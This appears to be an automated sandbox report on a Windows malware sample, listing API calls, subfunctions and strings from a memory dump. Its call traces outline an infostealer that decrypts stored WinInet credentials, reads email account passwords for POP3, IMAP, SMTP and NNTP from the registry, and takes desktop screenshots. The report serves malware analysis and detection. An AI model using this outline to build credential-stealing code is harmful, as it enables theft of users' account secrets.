                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1187395538-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00421A56,00000000,00000002,00421A56,00000000,?,?,?,00459DB6,00000000,00000000,00421A56,00000002), ref: 00459D42
                                                                                                    • GetLastError.KERNEL32(?,00459DB6,00000000,00000000,00421A56,00000002,?,004464A1,?,00000000,00000000,00000001,00421A56,?,?,00446557), ref: 00459D4C
                                                                                                    • __dosmaperr.LIBCMT ref: 00459D53
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                    • String ID:
                                                                                                    • API String ID: 2336955059-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042B322
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 0042BC7F: __EH_prolog.LIBCMT ref: 0042BC84
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate
                                                                                                    • String ID: "\
                                                                                                    • API String ID: 2428181759-2226538752
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040A2D9
                                                                                                      • Part of subcall function 004091F2: __EH_prolog.LIBCMT ref: 004091F7
                                                                                                      • Part of subcall function 004091F2: std::exception::exception.LIBCONCRT ref: 00409298
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$std::exception::exception
                                                                                                    • String ID: Unknown exception
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004137E9
                                                                                                      • Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: NA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004091F7
                                                                                                    • std::exception::exception.LIBCONCRT ref: 00409298
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologstd::exception::exception
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
                                                                                                    • _strlen.LIBCMT ref: 0041FCD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory_strlen
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00435489
                                                                                                      • Part of subcall function 00435346: lstrlenW.KERNEL32(00000000,?,?,?,0043549A), ref: 004353A8
                                                                                                      • Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353C0
                                                                                                      • Part of subcall function 00435346: lstrcpyW.KERNEL32 ref: 004353CC
                                                                                                    • _strlen.LIBCMT ref: 0043549D
                                                                                                      • Part of subcall function 004116B4: __EH_prolog.LIBCMT ref: 004116B9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologlstrcpy$_strlenlstrlen
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,0043E3C4,?), ref: 0043DE13
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0045DEB0
                                                                                                      • Part of subcall function 0045918E: RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,00460732,?,00000004,?,?,?,?,00454898,?,?), ref: 0045DEEC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap$_free
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADCA
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040ADDC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042B772
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F207
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004235F7
                                                                                                      • Part of subcall function 00438DFD: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00438E0F
                                                                                                      • Part of subcall function 00438DFD: OpenProcessToken.ADVAPI32(00000000), ref: 00438E16
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00438E30
                                                                                                      • Part of subcall function 00438DFD: GetLastError.KERNEL32 ref: 00438E3A
                                                                                                      • Part of subcall function 00438DFD: GlobalAlloc.KERNEL32(00000040,00000000), ref: 00438E4A
                                                                                                      • Part of subcall function 00438DFD: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 00438E5E
                                                                                                      • Part of subcall function 00438DFD: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00438E72
                                                                                                      • Part of subcall function 00438DFD: GlobalFree.KERNEL32 ref: 00438E92
                                                                                                      • Part of subcall function 004206DD: __EH_prolog.LIBCMT ref: 004206E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041388B
                                                                                                      • Part of subcall function 0040AA9C: __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040ABED: __EH_prolog.LIBCMT ref: 0040ABF2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0043E75E,?,00004000), ref: 0043E163
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: __wsopen_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 3347428461-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041F292,00000001,00000000,?,00000000,00000244), ref: 0041F090
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042056D
                                                                                                      • Part of subcall function 0041FCB2: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,004205B0,?,?,00000244,00488780,00000000,00000001,?,004208FF), ref: 0041FCD1
                                                                                                      • Part of subcall function 0041FCB2: _strlen.LIBCMT ref: 0041FCD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryH_prolog_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1906034785-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AAA1
                                                                                                      • Part of subcall function 0040A9DC: __EH_prolog.LIBCMT ref: 0040A9E1
                                                                                                      • Part of subcall function 0040A9DC: ___std_fs_directory_iterator_open@12.LIBCPMT ref: 0040AA4C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$___std_fs_directory_iterator_open@12
                                                                                                    • String ID:
                                                                                                    • API String ID: 1512400408-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004129CC
                                                                                                      • Part of subcall function 00413DA4: __EH_prolog.LIBCMT ref: 00413DA9
                                                                                                      • Part of subcall function 00413DA4: std::_Lockit::_Lockit.LIBCPMT ref: 00413DB7
                                                                                                      • Part of subcall function 00413DA4: int.LIBCPMT ref: 00413DCE
                                                                                                      • Part of subcall function 00413DA4: std::_Lockit::~_Lockit.LIBCPMT ref: 00413E1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prologLockitstd::_$Lockit::_Lockit::~_
                                                                                                    • String ID:
                                                                                                    • API String ID: 1350124489-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0045736D,00000001,00000364,00000008,000000FF,?,004401D2,?,?,00414650,?), ref: 0045854E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040A99A
                                                                                                      • Part of subcall function 0043EFBC: FindNextFileW.KERNEL32(?,?,?,0040AA65,?,?,?,?,?,?,?,?,00000000), ref: 0043EFC5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileFindNext___std_fs_directory_iterator_advance@8
                                                                                                    • String ID:
                                                                                                    • API String ID: 3878998205-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,004401D2,?,?,00414650,?,?,0041306E,?,?,?,00000000,?), ref: 004591C0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog2.LIBCMT ref: 0040A67D
                                                                                                      • Part of subcall function 0040A2D4: __EH_prolog.LIBCMT ref: 0040A2D9
                                                                                                      • Part of subcall function 004432AB: RaiseException.KERNEL32(E06D7363,00000001,00000003,004090EB,?,?,?,004090EB,?,004853BC), ref: 0044330B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologH_prolog2Raise
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 004137E4: __EH_prolog.LIBCMT ref: 004137E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0040AF08
                                                                                                      • Part of subcall function 00413886: __EH_prolog.LIBCMT ref: 0041388B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,?,00000000,00000000), ref: 0043F449
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FormatMessage
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • ___std_fs_set_current_path@4.LIBCPMT ref: 0041C967
                                                                                                      • Part of subcall function 0040A676: __EH_prolog2.LIBCMT ref: 0040A67D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog2___std_fs_set_current_path@4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,00464297,?,?,00000000,?,00464297,00000000,0000000C), ref: 00463EC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00435DEB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: NameUser
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CoInitialize.OLE32(00000000), ref: 0042A878
                                                                                                      • Part of subcall function 0042A224: CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
                                                                                                      • Part of subcall function 0042A130: lstrlenW.KERNEL32(?), ref: 0042A156
                                                                                                      • Part of subcall function 0042A130: lstrlenW.KERNEL32(00000002), ref: 0042A167
                                                                                                      • Part of subcall function 0042A130: CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
                                                                                                      • Part of subcall function 0042A130: CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
                                                                                                      • Part of subcall function 0042A130: LocalFree.KERNEL32(?), ref: 0042A200
                                                                                                      • Part of subcall function 0042A130: CredFree.ADVAPI32(?), ref: 0042A219
                                                                                                      • Part of subcall function 0042A2F9: GetVersionExW.KERNEL32(?), ref: 0042A341
                                                                                                      • Part of subcall function 0042A2F9: LoadLibraryA.KERNEL32(?), ref: 0042A395
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
                                                                                                      • Part of subcall function 0042A2F9: GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CredFreelstrlen$CreateCryptDataEnumerateInitializeInstanceLibraryLoadLocalUnprotectVersion
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    APIs
                                                                                                      • Part of subcall function 0043592B: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00000100,00000100,?,SMTP Email Address,0047C928), ref: 00435973
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 00435992
                                                                                                      • Part of subcall function 0043592B: RegQueryValueExW.KERNEL32(00000100,00000000,00000000,00000000,00000000,?), ref: 004359CD
                                                                                                      • Part of subcall function 0043592B: RegCloseKey.ADVAPI32(00000100), ref: 004359EE
                                                                                                    • CryptUnprotectData.CRYPT32(0047CB80,00000000,00000000,00000000,00000000,00000001,?), ref: 00434CB2
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CEA
                                                                                                    • lstrlenW.KERNEL32(POP3 Password,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434CF7
                                                                                                    • lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00434D1B
                                                                                                    • lstrlenW.KERNEL32(POP3 Port,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00434D9C
                                                                                                    • wsprintfA.USER32 ref: 00434DC8
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00434DD5
                                                                                                    • lstrlenW.KERNEL32(000007FF,?,?,00000000,00000000), ref: 00434B4A
                                                                                                      • Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68
                                                                                                    • lstrlenW.KERNEL32(SMTP Email Address,?,?,00000000,00000000), ref: 00434B26
                                                                                                      • Part of subcall function 00435A1E: lstrlenA.KERNEL32(?,?,751469A0,?,00000000), ref: 00435A4F
                                                                                                      • Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 00435A6E
                                                                                                      • Part of subcall function 00435A1E: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,751469A0,?,00000000), ref: 00435A91
                                                                                                      • Part of subcall function 00435A1E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000001B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,751469A0), ref: 00435ABD
                                                                                                      • Part of subcall function 00435ADB: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B00
                                                                                                      • Part of subcall function 00435ADB: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00429C15,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435B27
                                                                                                    • lstrlenW.KERNEL32(POP3 Password2,?,?,?,?,?,?,00000000,00000000), ref: 00434BC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
                                                                                                    • String ID: %d$Email$HTTP Password$HTTP Server URL$HTTP User$HTTPMail Password2$HTTPMail Server$HTTPMail User Name$IMAP Password$IMAP Password2$IMAP Port$IMAP Server$IMAP User$IMAP User Name$NNTP Email Address$NNTP Password$NNTP Password2$NNTP Server$NNTP User Name$POP3 Password$POP3 Password2$POP3 Port$POP3 Server$POP3 User$POP3 User Name$SMTP Email Address$SMTP Password$SMTP Password2$SMTP Port$SMTP Server$SMTP User$SMTP User Name
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0042C15C
                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0042C18A
                                                                                                    • GetDesktopWindow.USER32 ref: 0042C190
                                                                                                    • GetWindowRect.USER32 ref: 0042C19D
                                                                                                    • GetWindowDC.USER32(00000000), ref: 0042C1A4
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042C1C4
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0042C1CD
                                                                                                    • CreateDIBSection.GDI32(?,00000028,00000001,?,00000000,00000000), ref: 0042C218
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0042C22C
                                                                                                    • DeleteDC.GDI32(?), ref: 0042C231
                                                                                                    • SaveDC.GDI32(00000000), ref: 0042C238
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0042C244
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042C25D
                                                                                                    • RestoreDC.GDI32(00000000,00000000), ref: 0042C265
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0042C272
                                                                                                    • DeleteDC.GDI32(?), ref: 0042C277
                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0042C27B
                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0042C29B
                                                                                                    • _mbstowcs.LIBCMT ref: 0042C30E
                                                                                                    • GdipSaveImageToFile.GDIPLUS(?,00000000,?,?), ref: 0042C32B
                                                                                                    • DeleteObject.GDI32(00000010), ref: 0042C350
                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 0042C359
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Delete$CreateGdipWindow$GdiplusObjectSave$AllocBitmapCapsCompatibleDeallocateDesktopDeviceFileFromH_prologImageRectRestoreSectionSelectShutdownStartup_mbstowcs
